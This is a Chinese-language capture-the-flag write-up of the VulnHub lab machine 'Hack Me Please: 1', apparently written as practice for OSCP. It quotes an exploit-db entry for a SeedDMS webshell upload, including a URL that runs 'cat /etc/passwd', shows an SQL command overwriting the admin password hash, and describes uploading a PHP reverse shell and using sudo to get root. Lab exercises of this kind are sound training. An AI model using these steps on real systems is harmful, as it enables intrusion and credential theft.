vulnhub刷題記錄(Hack Me Please: 1)

語言: CN / TW / HK
  • 英文名稱 :Hack Me Please: 1
  • 中文名稱 :請黑我:1
  • 釋出日期 :2021 年 7 月 31 日
  • 難度 :容易
  • 描述 :一個完全為 OSCP 製作的簡單盒子。不需要蠻力。目標:獲取root shell
  • 下載地址https://www.vulnhub.com/entry/hack-me-please-1,731/

1、開機(Ubuntu_CTF)

開機

2、主機發現(192.168.199.109)

主機發現

3、埠掃描(80、3306)

埠掃描

4、web首頁

Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker."
-Emmanuel Goldstein
大多數黑客都很年輕,因為年輕人往往適應能力強。 只要你保持適應能力,你就永遠可以成為一名優秀的黑客。
——伊曼紐爾·戈德斯坦
web首頁

5、檢視原始碼,在js註釋中找到線索

檢視原始碼

6、訪問頁面

訪問頁面

7、查詢漏洞

searchsploit SeedDMS
查詢漏洞

8、檢視漏洞簡介

發現需要登入之後,才能利用檔案上傳漏洞

─# find / -name "47022.txt" 2>/dev/null
/usr/share/exploitdb/exploits/php/webapps/47022.txt
                                                                                                      
Step 1: Login to the application and under any folder add a document.
登入到應用程式並在任何資料夾下新增一個文件。
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
選擇文件作為簡單的 php 後門檔案,或者可以使用任何後門/webshell。
Step 3: Now after uploading the file check the document id corresponding to the document.
現在上傳檔案後檢查與文件對應的文件ID。
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
現在轉到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在瀏覽器中獲取命令響應。

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.   
注意:這裡的“data”和“1048576”是儲存上傳檔案的預設資料夾。

9、在conf/settings.xml中發現mysql的使用者名稱密碼

dbDatabase="seeddms" 
dbUser="seeddms" 
dbPass="seeddms"
conf 目錄

10、登入mysql,檢視web的使用者名稱密碼,發現登入不成功

use seeddms;
show tables;
select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
檢視users表

10、繼續檢視 tblUsers 表,找到admin的pwd

admin密碼

11、線上破解md5,快如閃電(undefined應該是解密失敗,尷尬),發現還是無法登入

undefined
破解md5

12、篡改md5值

└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1
83b70504e0d8742dd5b66e6962eb8a35

update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin";
select login,pwd from tblUsers;
篡改md5

13、繼續登入

密碼正確

14、上傳反彈shell

使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼

kali自帶的php反彈shell指令碼
修改IP地址和埠
上傳成功

15、本地監聽,再點選web頁面的反彈shell

反彈成功
最後檔名會被修改成 1.php

16、切換使用者,使用users表中的使用者名稱密碼,sudo獲得root許可權

select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
獲得root許可權

到此,實驗完成~

參考

  1. md5破解   https://pmd5.com/